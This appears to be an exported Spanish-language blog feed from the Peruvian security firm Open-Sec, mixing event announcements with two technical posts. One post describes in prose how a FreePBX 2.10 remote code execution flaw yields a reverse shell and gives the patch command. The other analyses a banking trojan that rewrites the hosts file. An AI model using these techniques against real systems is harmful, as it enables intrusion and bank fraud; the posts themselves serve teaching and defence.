<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1M3-RwahMWfGrXaVoyKhyphenhyphenZiJ386mCtwU7OVVC5MeT2w3BIkAQIv9jQF9SOC-o_D6sah0qeHrPybmaTZ9f48qF1_McZIFLi4ZOo4LjKrfyWyiZlsOn7QVPirQ2tCwo6RoD5sohRGFep80/s1600/GuayaquilHack2012-Exploits.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1M3-RwahMWfGrXaVoyKhyphenhyphenZiJ386mCtwU7OVVC5MeT2w3BIkAQIv9jQF9SOC-o_D6sah0qeHrPybmaTZ9f48qF1_McZIFLi4ZOo4LjKrfyWyiZlsOn7QVPirQ2tCwo6RoD5sohRGFep80/s400/GuayaquilHack2012-Exploits.png" width="400" /></a></div>
<br />Open-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-5781443109672762562012-04-30T23:37:00.001-05:002012-04-30T23:37:26.902-05:00Seminario de Ethical Hacking Ninjahack<br />
<div style="margin-bottom: 0cm;">
</div>
<div style="margin-bottom: 0cm;">
El pasado 25 de Abril <a href="http://www.open-sec.com/" target="_blank">OPEN-SEC</a> en alianza estratégica con <a href="http://perulinux.pe/" target="_blank">ADIESTRA</a>, desarrolló el Seminario de Ethical Hacking "Ninjahack", para los ganadores durante el evento "<a href="http://issaperu.org/?page_id=916" target="_blank">Cyber Security Government 2012</a>" , durante el seminario se pudieron ver temas como :</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="margin-bottom: 0cm;">
- Estándares y metodologías</div>
<div style="margin-bottom: 0cm;">
- Información sobre certificaciones</div>
<div style="margin-bottom: 0cm;">
- Mecanismos para Footprint</div>
<div style="margin-bottom: 0cm;">
- Herramientas de Google Hacking</div>
<div style="margin-bottom: 0cm;">
- Tipos de escaneos de puertos y como realizarlo de manera efectiva</div>
<div style="margin-bottom: 0cm;">
- SQL Inyection , teoría, técnicas y demostraciones</div>
<div style="margin-bottom: 0cm;">
- Torneo de Hacking</div>
<br />
<br />
<table border="0" style="width: 200px;">
<tbody>
<tr>
<td><div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-49PYSWO12W8/T59gtiUllAI/AAAAAAAAACE/l9U_GBepuiA/s1600/20120425_202228.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-49PYSWO12W8/T59gtiUllAI/AAAAAAAAACE/l9U_GBepuiA/s200/20120425_202228.jpg" width="150" /></a></div>
</td>
<td><div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-G7QGHs2vwyw/T59d7jTFdPI/AAAAAAAAAB0/x7SpKZlFtJQ/s1600/20120425_191130.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-G7QGHs2vwyw/T59d7jTFdPI/AAAAAAAAAB0/x7SpKZlFtJQ/s200/20120425_191130.jpg" width="150" /></a></div>
</td>
<td><div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-0X-Deo3G0do/T59hsyx0JoI/AAAAAAAAACM/GA5s7rW4ra8/s1600/20120425_222144.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-0X-Deo3G0do/T59hsyx0JoI/AAAAAAAAACM/GA5s7rW4ra8/s200/20120425_222144.jpg" width="150" /></a></div>
</td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-bottom: 0cm;">
<br /></div>Anonymousnoreply@blogger.com3tag:blogger.com,1999:blog-1142420473059173802.post-26634523108936364482012-04-17T19:00:00.000-05:002013-10-23T00:37:43.589-05:00Open-Sec presente en el Cyber Security Government 2012<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-TuUYcClF81k/T43-Fx6mBHI/AAAAAAAAABc/Uc67N_9C8bQ/s1600/Cyber-Security.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="http://1.bp.blogspot.com/-TuUYcClF81k/T43-Fx6mBHI/AAAAAAAAABc/Uc67N_9C8bQ/s400/Cyber-Security.jpg" width="400" /></a></div>
<br />
Exitosa fue la participación de <a href="http://www.open-sec.com/" target="_blank">Open-Sec</a> durante el evento que se desarrolló el pasado jueves 12 de abril, con la ponencia "Los TOP 10 de vulnerabilidades y ataques en las entidades del Gobierno Peruano" donde se brindaron detalles sobre los ataques más representativos a los organismos del Perú, el cual estuvo a cargo por Walter Cuestas (<a href="https://twitter.com/#!/wcu35745" target="_blank">@wcu35745</a>) - Gerente General de <a href="http://www.open-sec.com/" target="_blank">Open-Sec</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div id="__ss_12546167" style="width: 425px;">
<strong style="display: block; margin: 12px 0 4px;"><a href="http://www.slideshare.net/wcuestas/mile2-top10latam-25266201" target="_blank" title="Top 10 Vulnerabilidades Gobierno peruano 2011">Top 10 Vulnerabilidades Gobierno peruano 2011 - Versión Actualizada para Latam</a></strong><strong style="display: block; margin: 12px 0 4px;"><br /></strong></div>
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/25266201" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" width="427"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/wcuestas/mile2-top10latam-25266201" target="_blank" title="Mile2 top10latam">Mile2 top10latam</a> </strong> from <strong><a href="http://www.slideshare.net/wcuestas" target="_blank">wcuestas</a></strong> </div>
<br />
Así mismo <a href="http://www.open-sec.com/" target="_blank">Open-Sec</a> en alianza con <a href="http://www.adiestra.pe/" target="_blank">Adiestra</a> , sortearon a los participantes, entradas de participación al "Seminario de Ethical Hacking" a desarrollarse el próximo 25 de Abril.<br />
<br />
Finalmente, tuvimos la oportunidad de fraternizar con amigos como Leonardo Pigñer ( <a href="https://twitter.com/#!/KFS" target="_blank">@KFS</a> ) de <a href="http://www.base4sec.com/" target="_blank">BASE4 Security</a>, así como otros grandes amigos , con los cuales pudimos departir durante el almuerzo.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-a22UQAzeO_Q/T44BP4dUyaI/AAAAAAAAABs/1fJgdfBzdyg/s1600/almuerzoenlima.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="http://1.bp.blogspot.com/-a22UQAzeO_Q/T44BP4dUyaI/AAAAAAAAABs/1fJgdfBzdyg/s320/almuerzoenlima.JPG" width="320" /></a></div>
<br />
<br />
<br />Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-47422929958295068492012-04-02T22:56:00.002-05:002012-04-02T22:56:43.153-05:00Explotando Vulnerabilidad en FreePBX 2.10En el marco del <a href="http://ehopen-sec.blogspot.com/2012/04/primer-seminario-de-per-systems-como.html" target="_blank">Primer seminario de PER Systems como ATC de Mile2 </a> realicé una charla titulada "Hacking Voip" , debido a esto ejecuté la demostración de explotación, de una vulnerabilidad reciente (en ese momento) en la aplicación web "Freepbx" y que afecta a las versiones 2.10<br />
<br />
Este exploit fue publicado en exploit DB (<a href="http://www.exploit-db.com/exploits/18650/" target="_blank">http://www.exploit-db.com/exploits/18650/</a> ) el 23/03/2012<br />
En este caso la vulnerabilidad es de tipo “Remote Code Execution
Exploit” , es decir inyecta código en una pagina no autentificada de <a href="http://www.freepbx.org/trac/wiki" target="_blank">Freepbx</a>,
determinadas variables que generan la ejecución de sentencias del
sistema operativo vía la función “system” de asterisk , lo cual genera
una conexión reversa desde el host atacado hacia el host del atacante
vía el puerto 443.<br />
<br />
La vulnerabilidad es posible explotar, bajo estas condiciones :<br />
<br />
- Tener abierto el entorno de administración (80 y/o 443)<br />
- Conocer el numero de alguna extensión del host atacado<br />
- Tener activado el Voicemail de la extensión atacada.<br />
<br />
El siguiente vídeo muestra como explotar esta vulnerabilidad<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/o7xyePSSq9Q" width="560"></iframe>
<br />
<br />
Para parchar la vulnerabilidad es necesario ejecutar el comando : <strong style="font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center;"><span class="il">yum</span> <span class="il">update</span> <span class="il">freePBX</span></strong><br />
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;"><b><br /></b></span></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;">Saludos</span></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;">Juan Oliva</span></span></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-6957149386276592352012-04-02T08:15:00.001-05:002012-04-02T08:15:53.014-05:00Primer seminario de PER Systems como ATC de Mile2Con motivo del anuncio de la realización del primer curso de certificación C)PTE , se desarrolló pasado jueves 29 de Marzo, el primer seminario de Ethical Haking organizado por <a href="http://www.persystems.com/" target="_blank">PER Systems</a> en su calidad de ATC de <a href="http://mile2.com/" target="_blank">Mile2</a>.<br />
<br />
En el cual participaron los Consultores Senior de <a href="http://www.open-sec.com/" target="_blank">Open-sec</a> e instructores autorizados por Mile2, Mauricio Urizar con el tema "Hacking de cajeros Automáticos" y Juan Oliva con "Hacking Voip" respectivamente.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-W6gsgqQX1QU/T3k1GnI_nKI/AAAAAAAAABE/CWak6EqdFYw/s1600/P1030188.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://1.bp.blogspot.com/-W6gsgqQX1QU/T3k1GnI_nKI/AAAAAAAAABE/CWak6EqdFYw/s320/P1030188.JPG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-IWRdcKBWn88/T3k1rVCrOAI/AAAAAAAAABM/Hk8TqV_0sGA/s1600/IMG.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-IWRdcKBWn88/T3k1rVCrOAI/AAAAAAAAABM/Hk8TqV_0sGA/s320/IMG.jpeg" width="320" /></a><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Xw_EOrNM2Ek/T3k28dMn4NI/AAAAAAAAABU/QCXn5sJjfVY/s1600/P1030196.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://4.bp.blogspot.com/-Xw_EOrNM2Ek/T3k28dMn4NI/AAAAAAAAABU/QCXn5sJjfVY/s320/P1030196.JPG" width="320" /></a></div>
<br />
Finalmente Walter Cuestas, Gerente General de <a href="http://www.open-sec.com/" target="_blank">Open-sec</a> , dio a conocer el <b>"Course road map"</b> de certificaciones de <a href="http://www.mile2.com/" target="_blank">Mile2</a>. las cuales se brindarán próximamente en el Perú.Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-39641618493120024312012-03-17T19:01:00.001-05:002012-04-02T22:34:19.804-05:00Webminar Scripting para Pentesters<a href="http://ehopen-sec.blogspot.com/" target="_blank">Open-Sec</a> y <a href="http://www.persystems.com/" target="_blank">PER Sytems S.A</a>, en su calidad de Centros autorizados de Entrenamiento de <a href="http://mile2.com/" target="_blank">Mile2</a>, han organizado el próximo viernes 30 de marzo del 2012 a partir de las 17:00pm, (hora Lima-Perú) un seminario online "webminar" titulado "Scripting para Pentesters"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="154" src="http://4.bp.blogspot.com/-sOuXZRBvt-g/T2Uezi9ps0I/AAAAAAAAAA0/WQEBhONY16Y/s320/Selecci%25C3%25B3n_294.png" width="320" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
"Cualquier persona dedicada al ethical hacking o pentesting utilizará, en alguna etapa de su labor, herramientas que han sido desarrolladas en base a lenguajes scripting y muchas veces no funcionan como se esperan, como dice la documentación, o se hacer más de lo que la herramienta lo permite. esto implica tener conocimientos de bash, batch, Python, Rubi, PHP, Perl...etc.<br />
<br />
Sin embargo, los conocimientos que requiere un pentester para corregir, modificar o ampliar un programa pueden ser mas simples y eso es lo que el webminar demostrará a través de ejemplos diversos con herramientas usadas a lo largo de las etapas de un pentesting"<br />
<br />
Mas información e inscripciones en : <a href="http://www.persystems.com/mile/Webminar%20Scripting.htm">http://www.persystems.com/mile/Webminar%20Scripting.htm</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ez6ZM4ke3rU/T2UjmiGVRVI/AAAAAAAAAA8/vucBuObhC6g/s1600/Selecci%25C3%25B3n_295.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="http://2.bp.blogspot.com/-ez6ZM4ke3rU/T2UjmiGVRVI/AAAAAAAAAA8/vucBuObhC6g/s320/Selecci%25C3%25B3n_295.png" width="420" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>Actualización 02/04/2012 </b><br />
<div class="separator" style="clear: both; text-align: left;">
Con mucho éxito se desarrollo el webminar , a continuación la presentación del evento :</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div id="__ss_12238205" style="width: 425px;">
<strong style="display: block; margin: 12px 0 4px;"><a href="http://www.slideshare.net/wcuestas/scripting-parapentesters-v10" target="_blank" title="Scripting para Pentesters v1.0">Scripting para Pentesters v1.0</a></strong> <iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/12238205" width="425"></iframe> <br />
<div style="padding: 5px 0 12px;">
View more <a href="http://www.slideshare.net/" target="_blank">presentations</a> from <a href="http://www.slideshare.net/wcuestas" target="_blank">wcuestas</a> </div>
</div>Anonymousnoreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-53483380086027239392012-03-11T01:36:00.001-05:002012-03-11T02:09:40.858-05:00Open-Sec ahora Centro Autorizado de Entrenamiento de Mile2Es un gusto anunciarles que <a href="http://www.open-sec.com/" target="_blank">Open-sec</a> ahora es Centro Autorizado de Entrenamiento (ATC) de <a href="http://mile2.com/" target="_blank">Mile2</a>, distinción lograda debido a contar con un staff de consultores certificados por esta institución.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://mile2.com/" target="_blank"><img border="0" height="100" src="http://4.bp.blogspot.com/-vmNaMvn0lZ0/T1wrqrgpHhI/AAAAAAAAAAM/HUt4AusZFC8/s400/Auth-Train-Ctr-logo-web.png" width="400" /></a></div>
<br />
<br />
<br />
<div lang="es-ES" style="margin-bottom: 0cm;">
<a href="http://mile2.com/" target="_blank">Mile2</a> es una empresa que
diseña, desarrolla y ofrece formación en seguridad y servicios de
seguridad de la información, que cumplen con las exigencias de instituciones militares, gobierno y sector privado.</div>
<div lang="es-ES" style="margin-bottom: 0cm;">
De este modo, mile2 ha
convertido en el estándar de facto para las empresas y organizaciones militares en todo el mundo. Cuenta con oficinas en los EE.UU., Reino
Unido, Oriente Medio y Asia.</div>
<div lang="es-ES" style="margin-bottom: 0cm;">
<br /></div>
<div lang="es-ES" style="margin-bottom: 0cm;">
<a href="http://www.open-sec.com/" target="_blank">Open-sec</a> , ahora podrá impartir entrenamiento conducente de las mas importantes certificaciones de la industria como son :</div>
<div lang="es-ES" style="margin-bottom: 0cm;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://mile2.com/" target="_blank"><img border="0" height="50" src="http://3.bp.blogspot.com/-WNZTKWGghas/T1wvsrRby3I/AAAAAAAAAAs/1tLhuKdREQk/s400/certs_mile2.png" width="520" /></a></div>
<div lang="es-ES" style="margin-bottom: 0cm;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="margin-bottom: 0cm;">
<br />
Muy pronto, se organizarán los primeros
cursos de certificación.</div>
<br />
<br />Anonymousnoreply@blogger.com1tag:blogger.com,1999:blog-1142420473059173802.post-91374749912344869992011-09-14T11:38:00.000-05:002011-09-14T11:38:12.899-05:00LimaHack 2011 - Call For PapersExtraido de: <a href="http://limahack.com/index.aspx?pagina=cfp.aspx">http://limahack.com/index.aspx?pagina=cfp.aspx</a><br />
<br />
Te parece gracioso como quieren parar el "hacktivismo" de Anonymous ampliando los anchos de banda ? Te resulta divertido explicarle a los demas como piratasdelared saco informacion de algunos sitios ? Ahora tu fingerprint (footprint para otros) incluye los sitios pastebin ? Blogueas continuamente explicando tecnicas de explotacion de vulnerabilidades ? Eres un pentester profesional ? No mandas mails a las listas de correo pidiendo ayuda para que funcione tu hack tool sino que la hackeas para que funcione "as expected" ? Aprendiste a desarrollar exploits y ahora quieres gritarselo al mundo (bueno, por ahora al menos a todo Perú) ? Investigaste sobre como funciona Stuxnet y quieres compartir todo ese conocimiento ? Eres bueno explicando a los "nuevos" y gerentes los temas de hacking ? Eres mujer y hackeas como Joanna Rutkowska ? Dominas algun framework de hacking al 100% ?<br />
<br />
Si respondiste SI, entonces eres la cantidadata (las mujeres primero) o el candidato ideal para exponer en LimaHack 2011 y el motivo principal es querer compartir el conocimiento con los demas.<br />
<br />
Todos esos motivos son un ejemplo de lo que esperamos sean las exposiciones durante esta edicion de LimaHack 2011 que considera charlas por diferentes niveles de conocimiento :<br />
- Introductorio<br />
- Medio / Tutorial<br />
- Avanzado<br />
<br />
Tambien hemos considerado diferentes tipos de exposiciones :<br />
- Networking. Orientado a hacking de dispositivos de red.<br />
- Desarrollo. Orientado a hacking de aplicaciones en general.<br />
- Administracion de Sistemas. Lo mas clasico del hacking.<br />
- Consultoria. Para consultores que ven tema de seguridad, ejemplo : el tecnico que instala los IPSs.<br />
<br />
Es importante que tengas en cuenta que LimaHack es acerca de hacking de seguridad y temas relacionados (analisis de incidentes, computacion forense). LimaHack no es acerca de como establecer un SGSI ni como auditar con respecto a COBIT ni los 10 mejores tips para configurar un firewall.<br />
<br />
LimaHack es un evento que durara un dia completo y que tendra charlas en paralelo, asi que hay muchas oportunidades de presentar tus investigaciones y compartir lo que sabes.<br />
<br />
El Comite organizador evaluara los "papers" que envies, te confirmara tu participacion y en base a esto se publicara la agenda.<br />
<br />
Por ser un evento 100% gratuito, no habra cobertura de gastos de viaje de ningun tipo.<br />
<br />
Es importante que estes 100% seguro del compromiso que asumiras y que se requerira que prepares una presentacion y que el contenido sera revisado previamente asi como la ejecucion de la exposicion.<br />
No esperamos demos en vivo y reales de como meterse a la base de datos de una organizacion, por ejemplo, porque entonces seria nuestro ultimo LimaHack, solo cuentas como hiciste y si estas mintiendo, el detector de mentiras te pasara una descarga de 50,000 voltios para que recapacites ;)<br />
<br />
IMPORTANTE : LimaHack es el evento MAS tecnico de seguridad en Perú, no se aceptaran papers que propongan promocion de productos, servicios, marcas, etc.<br />
<br />
De que hablamos : LimaHack 2011 Call For Papers<br />
Cuando : El CfP se cerrara el 29 de setiembre<br />
Como : Completar el formato del paper de acuerdo al ejemplo colocado en <<a href="http://limahack.com/nombre-apellido-titulo_paper.txt">paper_ejemplo.txt</a>> y enviarlo en formato de texto plano y simple a cfp@limahack.com<br />
(El nombre del archivo debe tener el formato : nombre-apellido-titulo_paper.txt)Open-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-81949002783602301722011-08-11T12:58:00.001-05:002011-08-11T13:05:00.743-05:00OWASP Latam Tour 2011 en LimaLes copio la invitación del capítulo local de OWASP.<br />
<br />
Estimados,<br />
<br />
El presente correo es para invitarlos al OWASP LATAM TOUR 2011, el cual esta organizado en conjunto por el Capitulo Peruano de OWASP y OWASP Foundation, el ingreso es libre para miembros de OWASP y estudiantes Universitarios (Pre-Grado) quienes deberán acreditar su ingreso con el Carnet Universitario vigente.<br />
<br />
Si deseas ser miembro el proceso de registro se detalla líneas abajo.<br />
<br />
INFORMACIÓN RELACIONADA AL EVENTO<br />
<br />
Día : Sábado, 13 de Agosto del 2011<br />
Hora: 9 am - Acreditación<br />
10 am a 4 pm - Conferencias<br />
Dirección: Av. Salaverry 2625 – San Isidro (Frente al Hotel Meliá)<br />
Auditorio – Pabellón “A”, 4to piso (Capacidad de 150 personas)<br />
<br />
Sitio Web: <a href="https://www.owasp.org/index.php?title=LatamTour2011#tab=Lima.2C_Peru">https://www.owasp.org/index.php?title=LatamTour2011#tab=Lima.2C_Peru</a><br />
<br />
Registro: <a href="http://www.regonline.com/trainingdayperu">http://www.regonline.com/trainingdayperu</a><br />
<br />
<br />
PONENTES:<br />
<br />
- Fabio Cerullo<br />
<br />
Especialista en Seguridad en AIB Bank (Irlanda) - Miembro del Comité Global de Educación OWASP<br />
<br />
- Ing. Ricardo Supo<br />
<br />
Chief Security Office en Consultoría LimaSoft SAC - Líder Capítulo Peruano OWASP<br />
<br />
- Ing. Juan Pablo Quiñe<br />
<br />
CSO en Hewlett-Packard Perú<br />
<br />
- Ing. Andrés Morales<br />
<br />
Consultor Senior Seguridad Informática en Ximark<br />
<br />
- Bach. Mauricio Velazco<br />
<br />
Consultor de Seguridad en OpenSEC<br />
<br />
- John Vargas<br />
<br />
Consultor de Seguridad en ETEK INTERNACIONAL - Fundador y Líder Capítulo Peruano OWASP<br />
<br />
- Rolando Antón<br />
<br />
Coordinador de Servicios – Consultor de Seguridad en ETEK INTERNACIONAL<br />
<br />
<br />
PROGRAMA DEL EVENTO<br />
<br />
Presentación y palabras de Bienvenida<br />
John Vargas<br />
<br />
OWASP Top 10<br />
Fabio Cerullo<br />
<br />
Google Hacking<br />
John Vargas<br />
<br />
Presentación de SQLinJeymei<br />
Ricardo Supo<br />
<br />
OWASP Testing Guide<br />
Mauricio Velazco<br />
<br />
Usando técnicas Man in the Middle para la Seguridad Web<br />
Juan Pablo Quiñe<br />
<br />
2011 CWE/SANS - Top 25 Monster Mitigations & OWASP TOP10 2010<br />
Andres Morales<br />
<br />
OWASP WebGoat Project<br />
Rolando Antón<br />
<br />
Adicionalmente incluyo algo más de información acerca de OWASP<br />
<br />
¿Cómo ser miembro?<br />
<br />
Para hacerse de la membresia de OWASP deberán ingresar al siguiente Link:<br />
<br />
http://www.regonline.com/Register/Checkin.aspx?EventID=919827<br />
<br />
Seleccionar el tipo de Membresia ( Individual Member ) durante el proceso de pago podemos ingresar el Cupon de Descuento LATAM y se aplicara un descuento del 60% . (El costo normal es de 50 dolares).<br />
<br />
Al ser miembro de OWASP algunos de los beneficios son :<br />
<br />
Participacion de manera gratuita a todos los eventos organizados por OWASP Perú.<br />
Posibilidad de adquirir CPE's<br />
Pertener a OWASP Linked'In Grupo<br />
La lista de beneficios adicionales los podemos ver en<br />
https://www.owasp.org/index.php/Member_Offers<br />
https://www.owasp.org/index.php/MembershipOpen-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com0tag:blogger.com,1999:blog-1142420473059173802.post-13385380886350830452011-04-08T21:04:00.000-05:002011-04-08T21:04:17.871-05:00Troyanos Bancarios en Peru IIHola.<br />
<br />
Antes de leer esto, asegurate de leer la primera parte de este post <a href="http://ehopen-sec.blogspot.com/2011/02/troyanos-bancarios-en-peru-i-operacion.html">aqui</a> .<br />
<br />
En la <a href="http://ehopen-sec.blogspot.com/2011/02/troyanos-bancarios-en-peru-i-operacion.html">primera parte</a> mostre la manera como el malware era descargado a la victima haciéndose pasar por una postal de amor. Ahora veremos el funcionamiento del malware una vez ejecutado por la victima. El escenario : la victima recibe el correo, confia en el titulo, descarga el archivo Postal.exe y lo ejecuta.<br />
<br />
Antes de empezar, es importante recalcar que si reciben un archivo sospechoso NO LO EJECUTEN, apliquemos la politica del implicit deny. Todo lo que parece extraño, lo desechamos y solo leeremos y abriremos correos de contactos conocidos. Ademas tengan en cuenta tener siempre un antivirus actualizado. Por otro lado, si lo que quieren hacer es jugar con el malware para ver lo que hace, utilicen una maquina virtual para probarlo. Aunque algunos tipos de malware reconocen si estan corriendo sobre una maquina virtual y no ejecutan su payload, pero eso para otro dia.<br />
<br />
Ok, una vez ejecutado el malware lo primero que notamos es trafico de red inusual. Utilizamos un analizador de paquetes como <a href="http://www.wireshark.org/">Wireshark</a> para ver mas alla de lo evidente.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc98StystoZoEjMakbFQoS2ArIJUiFUFf8mQAqhjZy62mnFtvn6rgklAKscOCggxvU9p5NDxSTYrrWuDMspCLVO0jGyS3Dl9ro9pcDc6IrA1ajCc2dkGUAv0lsj7K2ob0AzMjmQRikZA8/s1600/hosts1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0azkimDGMsUnTjvXVlkkcTok6v_JdpEt0IzUyunJjq3f1ZZItXLhOHyNuIieZx_LbxHDqtTb_P3oUg8GdqNXLrYs4JCgQd6FdaGpxBof-nTwzOeBEJJJPjBnRaZ5aibDozuTjtadhzI/s1600/wireshark1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI0azkimDGMsUnTjvXVlkkcTok6v_JdpEt0IzUyunJjq3f1ZZItXLhOHyNuIieZx_LbxHDqtTb_P3oUg8GdqNXLrYs4JCgQd6FdaGpxBof-nTwzOeBEJJJPjBnRaZ5aibDozuTjtadhzI/s400/wireshark1.png" width="400" /></a></div><br />
<br />
En los paquetes 1y2 se observa una resolución DNS de un dominio .com. Al revisar el host, vemos que es de una empresa de latinoamerica cuyo servidor probablemente ha sido vulnerado como parte de la campaña. En 3,4 y 5 vemos el establecimiento de una sesión TCP el famoso <a href="http://en.wikipedia.org/wiki/Transmission_Control_Protocol">SYN - SYN-ACK - ACK</a> hacia el puerto 80 del server mencionado. A partir del paquete numero 6 vemos lo mas interesante, un requerimiento HTTP con el metodo GET hacia un recurso localizado en <span style="color: red;">/images/bg.jpg</span><br />
<br />
Al ver el contenido de esta supuesta imagen las primeras lineas nos develan la naturaleza del ataque. <span style="color: red;"> </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc98StystoZoEjMakbFQoS2ArIJUiFUFf8mQAqhjZy62mnFtvn6rgklAKscOCggxvU9p5NDxSTYrrWuDMspCLVO0jGyS3Dl9ro9pcDc6IrA1ajCc2dkGUAv0lsj7K2ob0AzMjmQRikZA8/s1600/hosts1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc98StystoZoEjMakbFQoS2ArIJUiFUFf8mQAqhjZy62mnFtvn6rgklAKscOCggxvU9p5NDxSTYrrWuDMspCLVO0jGyS3Dl9ro9pcDc6IrA1ajCc2dkGUAv0lsj7K2ob0AzMjmQRikZA8/s400/hosts1.png" width="400" /></a></div><br />
Al final del archivo, vemos lo mas interesante.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPuQmZE7j6rxUXO42dGd5QGQmepFZtCDzOU3-fJEH9mvvua-ofZURVQ6lK102sBeQm8gbJzGy6EbbB-2W93NlL-vL9v7zUaPDRkLqLvSLg2P1uR7876PTS4vnwNM30syAP3KpsPVTThmk/s1600/hosts2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPuQmZE7j6rxUXO42dGd5QGQmepFZtCDzOU3-fJEH9mvvua-ofZURVQ6lK102sBeQm8gbJzGy6EbbB-2W93NlL-vL9v7zUaPDRkLqLvSLg2P1uR7876PTS4vnwNM30syAP3KpsPVTThmk/s400/hosts2.png" width="400" /></a></div><br />
<br />
En su totalidad, este es el famoso archivo <a href="http://es.wikipedia.org/wiki/Archivo_hosts">hosts</a>. Para los que no saben que es, una breve descripcion. Como sabemos, los equipos en internet utilizan su dirección IP para comunicarse entre ellos. Dado que seria imposible para un ser humano acordarse de los numeros IP de todos los dominios que visita, se invento el protocolo DNS para resolver una direccion IP a un nombre de dominio. Claro, es mas facil para un usuario acordarse de <span style="color: red;">www.google.com</span> que de <span style="color: red;">74.125.226.115</span>.<br />
<br />
Sin embargo, el sistema operativo, antes de mandar una consulta al servidor DNS, lo primero que hace es revisar el archivos hosts. Este es un simple fichero localizado en el sistema de archivos del equipo (en Windows: <span style="color: red;">C:\Windows\System32\drivers\etc\hosts</span> En linux: <span style="color: red;">/etc/hosts </span>) que contiene entradas con la estructura <span style="color: red;"><strong>Direccion IP : Dominio</strong></span>. En resumen, cuando escribes en tu navegador www.google.com lo que hace el sistema operativo primero es buscar en el archivo hosts si existe alguna entrada para ese dominio (www.google.com). De existir, toma la direccion IP del archivo e intenta conectarse al mismo. Es decir, ya no hace la consulta DNS y confia en el archivos hosts.<br />
<br />
